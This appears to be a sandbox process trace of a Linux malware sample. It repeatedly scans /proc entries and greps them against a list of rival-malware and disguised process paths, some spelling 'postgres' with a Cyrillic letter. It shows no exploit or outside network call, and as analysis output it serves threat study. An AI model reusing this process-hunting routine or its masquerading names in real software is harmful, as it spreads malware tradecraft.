/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:837
-
-
/bin/grepgrep exe2⤵PID:840
-
-
/bin/lsls -latrh /proc/202⤵PID:839
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:842
-
-
/bin/grepgrep exe2⤵PID:845
-
-
/bin/lsls -latrh /proc/212⤵PID:844
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:847
-
-
/bin/grepgrep exe2⤵PID:850
-
-
/bin/lsls -latrh /proc/222⤵PID:849
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:855
-
-
/bin/lsls -latrh /proc/232⤵PID:854
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:860
-
-
/bin/lsls -latrh /proc/242⤵PID:859
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:862
-
-
/bin/lsls -latrh /proc/2692⤵PID:864
-
-
/bin/grepgrep exe2⤵PID:865
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:870
-
-
/bin/lsls -latrh /proc/32⤵PID:869
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:872
-
-
/bin/grepgrep exe2⤵PID:875
-
-
/bin/lsls -latrh /proc/3522⤵PID:874
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:877
-
-
/bin/lsls -latrh /proc/3542⤵PID:879
-
-
/bin/grepgrep exe2⤵PID:880
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:882
-
-
/bin/lsls -latrh /proc/3582⤵PID:884
-
-
/bin/grepgrep exe2⤵PID:885
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:887
-
-
/bin/grepgrep exe2⤵PID:890
-
-
/bin/lsls -latrh /proc/362⤵PID:889
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:892
-
-
/bin/grepgrep exe2⤵PID:895
-
-
/bin/lsls -latrh /proc/3632⤵PID:894
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:897
-
-
/bin/lsls -latrh /proc/3672⤵PID:899
-
-
/bin/grepgrep exe2⤵PID:900
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:902
-
-
/bin/grepgrep exe2⤵PID:905
-
-
/bin/lsls -latrh /proc/372⤵PID:904
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:907
-
-
/bin/grepgrep exe2⤵PID:910
-
-
/bin/lsls -latrh /proc/3842⤵PID:909
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:912
-
-
/bin/grepgrep exe2⤵PID:915
-
-
/bin/lsls -latrh /proc/3862⤵PID:914
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/grepgrep exe2⤵PID:920
-
-
/bin/lsls -latrh /proc/3872⤵PID:919
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/lsls -latrh /proc/42⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:927
-
-
/bin/lsls -latrh /proc/4162⤵PID:929
-
-
/bin/grepgrep exe2⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:932
-
-
/bin/grepgrep exe2⤵PID:937
-
-
/bin/lsls -latrh /proc/52⤵PID:936
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:939
-
-
/bin/grepgrep exe2⤵PID:943
-
-
/bin/lsls -latrh /proc/62⤵PID:942
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:946
-
-
/bin/grepgrep exe2⤵PID:949
-
-
/bin/lsls -latrh /proc/6672⤵PID:948
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:952
-
-
/bin/grepgrep exe2⤵PID:956
-
-
/bin/lsls -latrh /proc/6712⤵PID:955
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:958
-
-
/bin/grepgrep exe2⤵PID:962
-
-
/bin/lsls -latrh /proc/6762⤵PID:961
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:965
-
-
/bin/grepgrep exe2⤵PID:969
-
-
/bin/lsls -latrh /proc/6772⤵PID:968
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:972
-
-
/bin/grepgrep exe2⤵PID:975
-
-
/bin/lsls -latrh /proc/6872⤵PID:974
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:979
-
-
/bin/grepgrep exe2⤵PID:982
-
-
/bin/lsls -latrh /proc/72⤵PID:981
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:985
-
-
/bin/grepgrep exe2⤵PID:989
-
-
/bin/lsls -latrh /proc/702⤵PID:988
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:991
-
-
/bin/grepgrep exe2⤵PID:995
-
-
/bin/lsls -latrh /proc/7002⤵PID:994
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:998
-
-
/bin/lsls -latrh /proc/7012⤵PID:1001
-
-
/bin/grepgrep exe2⤵PID:1002
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1005
-
-
/bin/grepgrep exe2⤵PID:1008
-
-
/bin/lsls -latrh /proc/7052⤵PID:1007
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1012
-
-
/bin/grepgrep exe2⤵PID:1015
-
-
/bin/lsls -latrh /proc/7062⤵PID:1014
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1018
-
-
/bin/grepgrep exe2⤵PID:1022
-
-
/bin/lsls -latrh /proc/7072⤵PID:1021
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1024
-
-
/bin/lsls -latrh /proc/7082⤵PID:1027
-
-
/bin/grepgrep exe2⤵PID:1028
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1031
-
-
/bin/grepgrep exe2⤵PID:1034
-
-
/bin/lsls -latrh /proc/712⤵PID:1033
-
-
